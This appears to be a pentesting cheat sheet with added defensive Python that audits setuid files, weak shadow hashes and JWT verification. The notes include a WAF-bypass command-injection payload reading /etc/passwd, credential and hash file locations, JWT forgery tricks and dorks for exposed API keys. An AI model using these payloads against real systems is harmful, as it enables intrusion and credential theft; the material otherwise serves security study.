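import tempfile


def audit_tree(root):
    """Return {'setuid': [...], 'setgid': [...], 'world_writable': [...]}.

    Paths are relative to root and sorted. Only regular files are reported
    (lstat, so symlinks are neither followed nor reported) and unreadable
    entries are skipped quietly, as 2>/dev/null does for find.
    """
    found = {"setuid": [], "setgid": [], "world_writable": []}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(path, root)
            if st.st_mode & stat.S_ISUID:
                found["setuid"].append(rel)
            if st.st_mode & stat.S_ISGID:
                found["setgid"].append(rel)
            if st.st_mode & stat.S_IWOTH:
                found["world_writable"].append(rel)
    for key in found:
        found[key].sort()
    return found


def build_demo_tree():
    """Constructed fixture: a throwaway tree with one file per finding type."""
    root = tempfile.mkdtemp(prefix="privesc-audit-demo-")
    os.makedirs(os.path.join(root, "opt", "app"))
    samples = {
        os.path.join("opt", "app", "helper"): 0o4755,      # setuid
        os.path.join("opt", "app", "shared"): 0o2755,      # setgid
        os.path.join("opt", "app", "config.ini"): 0o666,   # world-writable
        "README": 0o644,                                   # nothing to report
    }
    for rel, mode in samples.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("demo\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for kind, paths in audit_tree(target).items():
        print(f"{kind}: {len(paths)}")
        for p in paths:
            print("  ", p)
```

Run it as root with a real root directory (e.g. `python3 audit.py /`) to get the same listing the find commands produce, with the three categories separated.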

          Windows

    1. systeminfo - information about the target system
    2. cmdkey /list - list any saved credentials

    <-- Back

    Tips

    1. If the request carries JSON, try changing the JSON to XML
    2. Command Injection

      If you find Command Injection and the WAF blocks keywords, you can attempt a bypass method by adding a backslash and a newline character between the blacklisted words.

      c\%0aat /et\%0ac/pas\%0aswd
    3. If the target uses SVG files, try uploading an SVG with an XSS or XML payload
    4. Interesting file locations:

      Windows hashes

        Local computer:
      • File: \%systemroot%\system32\config\SAM
      • Registry: HKEY_LOCAL_MACHINE\SAM
      • File: \%systemroot%\system32\config\SECURITY
      • Registry: HKEY_LOCAL_MACHINE\SECURITY\SAM

        Active Directory:
      • %systemroot%\ntds\ntds.dit
    5. Identifying the algorithm from the first block of the hash:
      • Salted MD5 - $1$...
      • SHA-256 - $5$...
      • SHA-512 - $6$...
      • BCrypt - $2a$...
      • Scrypt - $7$...
      • Argon2 - $argon2i$...
    6. Headers:
      • X-Forwarded-For. (XFF) header is an HTTP header used to identify the original IP address of a client connecting to a web server through an HTTP proxy or load balancer. By including this header, the server can log and track the original client's IP address instead of the proxy or load balancer's IP.
    7. Virtual Box:
      • How to enable Nested VT-x in Windows:
        cd C:\Program Files\Oracle\VirtualBox
        VBoxManage.exe list vms
        VBoxManage.exe modifyvm "<NAME_OF_MACHINE>" --nested-hw-virt on
    8. Configuration files:
      • /.htaccess
      • /.htpasswd
      • /web.config
      • /.git/config
      • /nginx.conf
      • /server-status
      • /status
      • /cgi-bin/php.ini
    9. Secure your machine!
    10. mat2. Tool gets rid of metadata everywhere
    11. Unified Kill Chain

      1. Reconnaissance (MITRE Tactic TA0043)

      2. Weaponization (MITRE Tactic TA0001)

      3. Social Engineering (MITRE Tactic TA0001)

      4. Exploitation (MITRE Tactic TA0002)

      5. Persistence (MITRE Tactic TA0003)

      6. Defence Evasion (MITRE Tactic TA0005)

      7. Command & Control (MITRE Tactic TA0011)

      8. Pivoting (MITRE Tactic TA0008)

    12. Jenkins endpoints.
      • /signup
      • /jenkins/signup
    13. 403 Bypass
      • Try to change method to PATCH and add header Accept: application/json
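Added example, not from this repo, that parses the $id$ prefixes listed in the hash tip above (extended with the bcrypt 2b/2y, argon2id and yescrypt $y$ identifiers, which the tip does not list) and audits shadow-style lines for weak or low-cost hashes. The SAMPLE_SHADOW lines are constructed filler, not real credentials.

```python
# Prefix table from the tip above, extended with identifiers in common use
# that the tip does not list: 2b/2y (bcrypt), argon2id and $y$ (yescrypt).
PREFIXES = {
    "1": ("MD5-crypt", True),          # fast, fixed 1000 rounds: weak today
    "5": ("SHA-256-crypt", False),
    "6": ("SHA-512-crypt", False),
    "2a": ("bcrypt", False),
    "2b": ("bcrypt", False),
    "2y": ("bcrypt", False),
    "7": ("scrypt", False),
    "argon2i": ("Argon2i", False),
    "argon2id": ("Argon2id", False),
    "y": ("yescrypt", False),
}

MIN_BCRYPT_COST = 10   # log2 of the iteration count; below this is cheap to crack

# Constructed shadow-style lines: salts and hashes are filler, not real credentials.
SAMPLE_SHADOW = [
    "root:$6$rounds=5000$saltsalt$hashhash:19000:0:99999:7:::",
    "legacy:$1$saltsalt$hashhash:19000:0:99999:7:::",
    "svc:$2b$05$saltsaltsaltsaltsaltsahashhashhash:19000:0:99999:7:::",
    "nobody:*:19000:0:99999:7:::",
    "guest::19000:0:99999:7:::",
]


def identify_hash(hash_string):
    """Return (algorithm, weak, work_factor); (None, None, None) if not a known $id$ format.

    work_factor is the rounds= value for SHA-crypt or the cost for bcrypt,
    None when the format carries no explicit parameter in that position.
    """
    parts = hash_string.split("$")
    if len(parts) < 3 or parts[0] != "" or parts[1] not in PREFIXES:
        return (None, None, None)
    ident = parts[1]
    name, weak = PREFIXES[ident]
    work = None
    if ident in ("5", "6") and parts[2].startswith("rounds="):
        value = parts[2][len("rounds="):]          # $6$rounds=N$salt$hash
        work = int(value) if value.isdigit() else None
    elif name == "bcrypt" and parts[2].isdigit():
        work = int(parts[2])                        # $2b$COST$salt-and-hash
    return (name, weak, work)


def audit_shadow(lines):
    """Return [(user, finding), ...] for entries an admin should look at."""
    findings = []
    for line in lines:
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append((user, "empty password"))
        elif pw.startswith(("!", "*")):
            continue                                # locked or no password login
        else:
            name, weak, work = identify_hash(pw)
            if name is None:
                findings.append((user, "unrecognised hash format"))
            elif weak:
                findings.append((user, f"{name} is weak"))
            elif name == "bcrypt" and work is not None and work < MIN_BCRYPT_COST:
                findings.append((user, f"bcrypt cost {work} is low"))
    return findings
```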

    <-- Back

    GPTs (Agents) for Cybersecurity

    <-- Back

    OSINT

    1. Tools for searching data by email and logins

      Snusbase indexes information from leaks and provides access to searching compromised email addresses, logins, names, IP addresses, phone numbers, and password hashes

      Have I Been Pwned? is a data breach search engine. It allows you to check which incidents a specific email address has been involved in

      Hunter and Skymem - search for corporate email addresses by URL

      Whatsmyname - searches for accounts on various services by username. The service is based on publicly available JSON

      User Searcher - a free tool that helps find users by login on over 2,000 websites

      CheckUserNames, Instant, Namecheckr, Peekyou, Usersearch - online services for searching user accounts by username

    <-- Back

    API

    1. Tools
    2. Tips
    3. GraphQL

         Tools

         Tips

    1. Wordlists:

      seclists/Discovery/Web-Content/api/

      seclists/Discovery/Web-Content/api/objects.txt

      seclists/Discovery/Web-Content/api/actions.txt

      seclists/Discovery/Web-Content/swagger.txt

      seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt

    2. Try to:
      • Check the JS files to find API endpoints
      • Change methods
      • If BFLA doesn't allow you to see one record, try getting all of them (/users instead of /user/1)
      • Check version numbers (for example v0, v1, v2, v3, v4 etc)
      • Fuzz parameters and/or query
      • Remove Bearer from the Authorization header (Authorization: <JWT>)
    3. Endpoints:
    4. Google Dorking:
      • inurl:/api/admin site:target.com
      • inurl:"/wp-json/wp/v2/users" - Finds all publicly available WordPress API user directories
      • intitle:"index of" intext:"api"
      • intitle:"index.of" intext:"api.txt" - Finds publicly available API key files
      • inurl:"/api/*" intext:"index of" - Finds potentially interesting API directories
      • ext:php inurl:"api.php?action=" - Finds all sites with a XenAPI SQL injection vulnerability
      • intext:api filetype:env
      • intitle:"index of" api_key OR "api key" OR apiKey -pool - Lists potentially exposed API keys
      • intext:APIKey ext:js | xml | yaml | txt | conf | py intitle:"index of"
      • intitle:"index of" "api.yaml"
      • "api" ext:log
    5. Git Dorking:
      • filename:swagger.json
      • extension: .json
      • search for "api key", "api keys", "apikey", "authorization: Bearer", "access_token", "secret", or "token"
    6. Shodan:
      • port:80,443 http.status:200 "Content-Type: application/json"
      • "Content-Type: application/xml" - Find web servers returning potential endpoints that use XML (ie: SOAP)
      • "Content-Type: application/json" - Find web servers returning potential endpoints that use JSON
      • "wp-json" - This will search for web applications using the WordPress API
      • "X-*API*" hostname:"*.target.domain" - Find servers that contain custom headers related to "API", ie: X-API-KEY, X-API-VERSION, X-API-ENV, X-AMZ-API-PATH etc
      • ssl.cert.subject.cn:target.domain - Find servers that have been issued an SSL cert for *.target.domain
      • ssl:"<Company Name>" - Find servers that have been issued an SSL cert relating to the company you are targeting. Useful for certs generated by SaaS/cloud vendors offering services to the target (ie: AWS, Azure, Google, etc). This typically finds stuff in the Issued To organization fields.
    7. Some resources:

         GraphQL

    1. Tools
    2. Wordlists:
    3. Request -> To Repeater -> right-click > GraphQL > Set introspection query. Inserts an introspection query into the request body to reveal much more of the GraphQL schema tree for further manipulation
    4. Endpoints:
      • /graphql
      • /graphiql
      • /api
      • /api/graphql
      • /graphql/api
      • /graphql?debug=1
      • /graphql/graphql
      • If these common endpoints don't return a GraphQL response, you could also try appending /v1 to the path

    <-- Back

    WordPress

    • Endpoints:

      wp-json/wp/v2/users

    <-- Back

    JWT

    Some tips:
    • Great tool for working with JWT - JWT_Tool
    • Try simply changing parameters
    • Try deleting the whole signature, or a couple of its characters, and sending the request
    • Try to brute force the signing key
    • Send a request without a signature and set "alg":"none" (or None, nOne, NONE). Try sending it with and without the second dot.
    • Try to use JWK if the alg is asymmetric (RS256, ES256 etc)
    • If there is a jku header, try pointing it at your own URL that hosts a key
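Added example, not from this repo, of a verifier that makes the JWT tips above fail: the algorithm is pinned to a server-side allowlist (so "none" in any capitalisation is refused), the signature is compared in constant time, and tokens with a missing or truncated third segment are rejected. mint_token, encode_header and DEMO_KEY are constructed helpers for the offline demo.

```python
import base64
import hashlib
import hmac
import json

# Constructed secret for the demo; a real key comes from the server's configuration.
DEMO_KEY = b"constructed-demo-key-not-for-production"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_header(alg: str) -> str:
    """Constructed helper: the base64url header segment for a given alg value."""
    return b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())


def mint_token(claims: dict, key: bytes) -> str:
    """Constructed helper: build a valid HS256 token so the demo runs offline."""
    header = encode_header("HS256")
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def verify_token(token: str, key: bytes, allowed_algs=("HS256",)):
    """Return the claims dict for a valid token, otherwise None.

    Rejects: anything but three segments (the "no second dot" variant), an
    alg outside the server-side allowlist (none/None/nOne/NONE never match),
    an empty or truncated signature, and edited header or claims.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        provided = b64url_decode(sig_b64)
    except ValueError:            # bad base64 or JSON (binascii.Error is a ValueError)
        return None
    # The allowlist is the server's decision; the token's alg only has to match it.
    if not isinstance(header, dict) or header.get("alg") not in allowed_algs:
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not provided or not hmac.compare_digest(expected, provided):
        return None
    try:
        claims = json.loads(b64url_decode(payload_b64))
    except ValueError:
        return None
    return claims if isinstance(claims, dict) else None
```

A production service would additionally check exp/nbf and, for RS256/ES256, hold the public key itself rather than trusting a jwk or jku value carried in the token.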

    <-- Back